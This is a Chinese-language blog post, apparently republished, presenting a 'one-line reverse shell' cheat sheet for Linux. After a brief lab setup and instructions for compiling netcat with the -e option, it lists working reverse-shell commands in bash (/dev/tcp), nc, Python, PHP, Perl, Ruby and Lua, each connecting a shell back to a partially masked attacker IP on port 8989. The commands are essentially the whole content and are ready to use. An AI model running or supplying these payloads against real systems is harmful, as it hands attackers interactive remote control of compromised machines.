您现在的位置是:首页 > 文章详情

linux一句话反弹shell

日期:2018-07-06点击:444

参考文献:https://www.anquanke.com/post/id/87017

实验环境:

阿里云服务器:120.xxx.xxx.xx(开启了8989端口)
内网ubuntu:192.xxx.xx.xxx(无外网ip不可直接访问)

安装netcat

默认的各个linux发行版本已经自带了netcat工具包,但是可能由于处于安全考虑原生版本的netcat带有可以直接发布与反弹本地shell的功能参数 -e这里都被阉割了,所以需要手动下载二进制安装包。

下载安装包: #wget https://nchc.dl.sourceforge.net/project/netcat/netcat/0.7.1/netcat-0.7.1.tar.gz --no-check-certifica 解压: #tar -xvzf netcat-0.7.1.tar.gz 编译安装: /netcat-0.7.1# ./configure /netcat-0.7.1# make /netcat-0.7.1# make install /netcat-0.7.1# make clean 

1.使用bash命令反弹

1.1先在服务器上监听8989端口
nc -l -p 8989
1.2在目标机器上执行以下命令

bash -i >& /dev/tcp/120.xxx.xxx.xx/8989 0>&1 bash -i:产生一个bash交互环境 >&:将联合符号前面的内容与后面相结合然后一起重定向给后者 /dev/tcp/120.xxx.xxx.xx/8989:让攻击方与目标主机建立tcp链接 0>&1:将`标准的输入`与`标准输出`内容相结合,然后重定向给前面`标准输出`内容 

2.使用nc反弹

2.1先在服务器上监听8989端口
nc -l -p 8989
2.2在目标机器上执行以下命令
nc -e /bin/sh 120.xxx.xxx.xx 8989

3.一句话反弹shell

3.1python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("120.xxx.xxx.xxx",8989));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' 

3.2php

php -r '$sock=fsockopen("120.xxx.xxx.xxx",8989);exec("/bin/sh -i <&3 >&3 2>&3");' 

3.3perl

perl -e 'use Socket;$i="120.xxx.xxx.xxx";$p=8989;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' 

3.4ruby

ruby -rsocket -e'f=TCPSocket.open("120.xxx.xxx.xxx",8989).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' 

3.5lua

lua -e "require('socket');require('os');t=socket.tcp();t:connect('120.xxx.xxx.xxx','8989');os.execute('/bin/sh -i <&3 >&3 2>&3');" 
原文链接:https://yq.aliyun.com/articles/654373
关注公众号

低调大师中文资讯倾力打造互联网数据资讯、行业资源、电子商务、移动互联网、网络营销平台。

持续更新报道IT业界、互联网、市场资讯、驱动更新,是最及时权威的产业资讯及硬件资讯报道平台。

转载内容版权归作者及来源网站所有,本站原创内容转载请注明来源。

文章评论

共有0条评论来说两句吧...

文章二维码

扫描即可查看该文章

点击排行

推荐阅读

最新文章